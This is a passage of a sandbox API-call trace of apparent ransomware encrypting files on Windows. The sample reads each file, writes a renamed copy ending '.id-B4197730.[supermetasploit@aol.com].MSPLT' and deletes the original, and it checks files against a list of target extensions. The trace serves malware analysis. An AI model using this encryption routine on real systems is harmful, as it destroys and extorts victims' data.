[0170.822] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 1 [0170.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.822] lstrlenW (lpString=".doc") returned 4 [0170.822] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0170.822] lstrlenW (lpString=".docx") returned 5 [0170.822] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0170.822] lstrlenW (lpString=".pdf") returned 4 [0170.822] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0170.822] lstrlenW (lpString=".xls") returned 4 [0170.822] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0170.822] lstrlenW (lpString=".xlsx") returned 5 [0170.823] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0170.823] lstrlenW (lpString=".ppt") returned 4 [0170.823] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0170.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.823] lstrlenW (lpString=".zip") returned 4 [0170.823] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0170.823] lstrlenW (lpString=".rar") returned 4 [0170.823] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0170.823] lstrlenW (lpString=".bz2") returned 4 [0170.823] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0170.823] lstrlenW (lpString=".7z") returned 3 [0170.823] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0170.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.823] lstrlenW (lpString=".dbf") returned 4 [0170.823] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0170.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.823] lstrlenW (lpString=".1cd") returned 4 [0170.823] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0170.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.823] lstrlenW (lpString=".jpg") returned 4 [0170.823] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0170.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.824] lstrlenW (lpString=".doc") returned 4 [0170.824] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0170.824] lstrlenW (lpString=".docx") returned 5 [0170.824] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0170.824] lstrlenW (lpString=".pdf") returned 4 [0170.824] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0170.824] lstrlenW (lpString=".xls") returned 4 [0170.824] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0170.824] lstrlenW (lpString=".xlsx") returned 5 [0170.824] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0170.824] lstrlenW (lpString=".ppt") returned 4 [0170.824] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0170.824] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.824] lstrlenW (lpString=".zip") returned 4 [0170.824] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0170.824] lstrlenW (lpString=".rar") returned 4 [0170.824] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0170.824] lstrlenW (lpString=".bz2") returned 4 [0170.824] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0170.824] lstrlenW (lpString=".7z") returned 3 [0170.824] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0170.824] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.824] lstrlenW (lpString=".dbf") returned 4 [0170.824] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0170.824] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.825] lstrlenW (lpString=".1cd") returned 4 [0170.825] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0170.825] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0170.825] lstrlenW (lpString=".jpg") returned 4 [0170.825] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0170.825] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0170.825] lstrlenW (lpString="eula.rtf") returned 8 [0170.825] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0170.828] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=3546) returned 1 [0170.828] CloseHandle (hObject=0x2fc) returned 1 [0170.828] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 0x80 [0170.828] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.828] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0170.828] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.828] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.828] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0170.834] GetLastError () returned 0x0 [0170.834] ReadFile (in: hFile=0x2fc, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0xdda, lpOverlapped=0x0) returned 1 [0171.106] WriteFile (in: hFile=0x2f4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xde0, lpOverlapped=0x0) returned 1 [0171.107] ReadFile (in: hFile=0x2fc, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.108] WriteFile (in: hFile=0x2f4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xe4, lpOverlapped=0x0) returned 1 [0171.108] SetEndOfFile (hFile=0x2f4) returned 1 [0171.108] CloseHandle (hObject=0x2f4) returned 1 [0171.109] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.109] SetEndOfFile (hFile=0x2fc) returned 1 [0171.110] CloseHandle (hObject=0x2fc) returned 1 [0171.110] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.110] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 1 [0171.110] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.110] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.110] lstrlenW (lpString=".doc") returned 4 [0171.110] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.110] lstrlenW (lpString=".docx") returned 5 [0171.110] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.110] lstrlenW (lpString=".pdf") returned 4 [0171.110] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.110] lstrlenW (lpString=".xls") returned 4 [0171.110] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.110] lstrlenW (lpString=".xlsx") returned 5 [0171.110] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.110] lstrlenW (lpString=".ppt") returned 4 [0171.111] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.111] lstrlenW (lpString=".zip") returned 4 [0171.111] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.111] lstrlenW (lpString=".rar") returned 4 [0171.111] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.111] lstrlenW (lpString=".bz2") returned 4 [0171.111] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.111] lstrlenW (lpString=".7z") returned 3 [0171.111] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.111] lstrlenW (lpString=".dbf") returned 4 [0171.111] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.111] lstrlenW (lpString=".1cd") returned 4 [0171.111] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.111] lstrlenW (lpString=".jpg") returned 4 [0171.111] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.111] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.111] lstrlenW (lpString=".doc") returned 4 [0171.111] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.111] lstrlenW (lpString=".docx") returned 5 [0171.111] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.111] lstrlenW (lpString=".pdf") returned 4 [0171.111] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.111] lstrlenW (lpString=".xls") returned 4 [0171.111] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.111] lstrlenW (lpString=".xlsx") returned 5 [0171.111] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.111] lstrlenW (lpString=".ppt") returned 4 [0171.112] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.112] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.112] lstrlenW (lpString=".zip") returned 4 [0171.112] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.112] lstrlenW (lpString=".rar") returned 4 [0171.112] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.112] lstrlenW (lpString=".bz2") returned 4 [0171.112] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.112] lstrlenW (lpString=".7z") returned 3 [0171.112] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.112] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.112] lstrlenW (lpString=".dbf") returned 4 [0171.112] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.112] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.112] lstrlenW (lpString=".1cd") returned 4 [0171.112] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.112] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 35 [0171.112] lstrlenW (lpString=".jpg") returned 4 [0171.112] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.112] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0171.112] lstrlenW (lpString="LocalizedData.xml") returned 17 [0171.112] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0171.112] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=79634) returned 1 [0171.113] CloseHandle (hObject=0x2fc) returned 1 [0171.113] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 0x80 [0171.113] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.113] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0171.113] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.113] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.113] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0171.113] GetLastError () returned 0x0 [0171.113] ReadFile (in: hFile=0x2fc, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x13712, lpOverlapped=0x0) returned 1 [0171.267] WriteFile (in: hFile=0x2f4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x13720, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x13720, lpOverlapped=0x0) returned 1 [0171.270] ReadFile (in: hFile=0x2fc, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.270] WriteFile (in: hFile=0x2f4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xf6, lpOverlapped=0x0) returned 1 [0171.270] SetEndOfFile (hFile=0x2f4) returned 1 [0171.270] CloseHandle (hObject=0x2f4) returned 1 [0171.282] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.282] SetEndOfFile (hFile=0x2fc) returned 1 [0171.283] CloseHandle (hObject=0x2fc) returned 1 [0171.283] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.284] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 1 [0171.284] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.284] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.284] lstrlenW (lpString=".doc") returned 4 [0171.284] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.284] lstrlenW (lpString=".docx") returned 5 [0171.284] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.284] lstrlenW (lpString=".pdf") returned 4 [0171.284] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.284] lstrlenW (lpString=".xls") returned 4 [0171.284] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.284] lstrlenW (lpString=".xlsx") returned 5 [0171.284] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.284] lstrlenW (lpString=".ppt") returned 4 [0171.284] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.284] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.284] lstrlenW (lpString=".zip") returned 4 [0171.285] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.285] lstrlenW (lpString=".rar") returned 4 [0171.285] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.285] lstrlenW (lpString=".bz2") returned 4 [0171.285] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.285] lstrlenW (lpString=".7z") returned 3 [0171.285] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.285] lstrlenW (lpString=".dbf") returned 4 [0171.285] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.285] lstrlenW (lpString=".1cd") returned 4 [0171.285] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.285] lstrlenW (lpString=".jpg") returned 4 [0171.285] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.285] lstrlenW (lpString=".doc") returned 4 [0171.285] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.285] lstrlenW (lpString=".docx") returned 5 [0171.285] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.285] lstrlenW (lpString=".pdf") returned 4 [0171.285] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.285] lstrlenW (lpString=".xls") returned 4 [0171.285] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.285] lstrlenW (lpString=".xlsx") returned 5 [0171.285] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.285] lstrlenW (lpString=".ppt") returned 4 [0171.285] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.285] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.285] lstrlenW (lpString=".zip") returned 4 [0171.285] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.286] lstrlenW (lpString=".rar") returned 4 [0171.286] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.286] lstrlenW (lpString=".bz2") returned 4 [0171.286] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.286] lstrlenW (lpString=".7z") returned 3 [0171.286] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.286] lstrlenW (lpString=".dbf") returned 4 [0171.286] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.286] lstrlenW (lpString=".1cd") returned 4 [0171.286] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.286] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 44 [0171.286] lstrlenW (lpString=".jpg") returned 4 [0171.286] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.428] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0171.428] lstrlenW (lpString="eula.rtf") returned 8 [0171.428] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0171.428] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=4040) returned 1 [0171.428] CloseHandle (hObject=0x350) returned 1 [0171.428] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 0x80 [0171.429] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.429] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0171.429] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.429] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.429] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0171.440] GetLastError () returned 0x0 [0171.440] ReadFile (in: hFile=0x350, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0xfc8, lpOverlapped=0x0) returned 1 [0171.660] WriteFile (in: hFile=0x358, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xfd0, lpOverlapped=0x0) returned 1 [0171.661] ReadFile (in: hFile=0x350, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.661] WriteFile (in: hFile=0x358, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xe4, lpOverlapped=0x0) returned 1 [0171.661] SetEndOfFile (hFile=0x358) returned 1 [0171.662] CloseHandle (hObject=0x358) returned 1 [0171.662] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.662] SetEndOfFile (hFile=0x350) returned 1 [0171.663] CloseHandle (hObject=0x350) returned 1 [0171.663] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.664] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 1 [0171.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.664] lstrlenW (lpString=".doc") returned 4 [0171.664] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.664] lstrlenW (lpString=".docx") returned 5 [0171.664] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.664] lstrlenW (lpString=".pdf") returned 4 [0171.664] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.664] lstrlenW (lpString=".xls") returned 4 [0171.664] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.664] lstrlenW (lpString=".xlsx") returned 5 [0171.664] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.664] lstrlenW (lpString=".ppt") returned 4 [0171.664] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.664] lstrlenW (lpString=".zip") returned 4 [0171.664] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.664] lstrlenW (lpString=".rar") returned 4 [0171.664] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.664] lstrlenW (lpString=".bz2") returned 4 [0171.664] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.664] lstrlenW (lpString=".7z") returned 3 [0171.664] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.665] lstrlenW (lpString=".dbf") returned 4 [0171.665] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.665] lstrlenW (lpString=".1cd") returned 4 [0171.665] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.665] lstrlenW (lpString=".jpg") returned 4 [0171.665] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.665] lstrlenW (lpString=".doc") returned 4 [0171.665] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.665] lstrlenW (lpString=".docx") returned 5 [0171.665] lstrcmpiW 